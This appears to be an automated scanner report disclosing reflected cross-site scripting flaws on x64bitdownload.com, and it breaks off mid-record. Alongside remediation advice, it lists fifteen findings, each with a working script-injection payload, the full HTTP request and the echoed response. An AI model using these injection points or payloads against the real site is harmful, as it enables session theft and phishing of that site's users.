XSS, Cross Site Scripting, x64bitdownloads.com, CWE-79

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.x64bitdownload.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff09"><script>alert(1)</script>13dc0cda439 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ff09"><script>alert(1)</script>13dc0cda439=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:37 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/?2ff09"><script>alert(1)</script>13dc0cda439=1" />
...[SNIP]...

1.2. http://www.x64bitdownload.com/64-bit-assembling-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b79"><script>alert(1)</script>8459f495ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0" />
...[SNIP]...

1.3. http://www.x64bitdownload.com/64-bit-assembling-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634a7"><script>alert(1)</script>8617ba432e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1" />
...[SNIP]...

1.4. http://www.x64bitdownload.com/64-bit-atom-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55aa1"><script>alert(1)</script>7678cf509d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:14 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9" />
...[SNIP]...

1.5. http://www.x64bitdownload.com/64-bit-atom-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8505"><script>alert(1)</script>10d78ca816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1" />
...[SNIP]...

1.6. http://www.x64bitdownload.com/64-bit-audio-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3a9"><script>alert(1)</script>d0002961a7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e" />
...[SNIP]...

1.7. http://www.x64bitdownload.com/64-bit-audio-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c34"><script>alert(1)</script>baaa57e444b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1" />
...[SNIP]...

1.8. http://www.x64bitdownload.com/64-bit-automatic-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccfc"><script>alert(1)</script>7e29c8efc8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f" />
...[SNIP]...

1.9. http://www.x64bitdownload.com/64-bit-automatic-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85109"><script>alert(1)</script>d22981fa63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1" />
...[SNIP]...

1.10. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba5f"><script>alert(1)</script>cd53e677bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf" />
...[SNIP]...

1.11. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be8e"><script>alert(1)</script>09953da3321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1" />
...[SNIP]...

1.12. http://www.x64bitdownload.com/64-bit-binaries-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6728"><script>alert(1)</script>d227ac254cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf" />
...[SNIP]...

1.13. http://www.x64bitdownload.com/64-bit-binaries-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b928f"><script>alert(1)</script>b24ddd27216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1" />
...[SNIP]...

1.14. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd625"><script>alert(1)</script>5e17d0ba98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98" />
...[SNIP]...

1.15. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33c0"><script>alert(1)</script>a7faec4549f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:37 GMT
Cache-Control: max-age=600
Pragma: cache
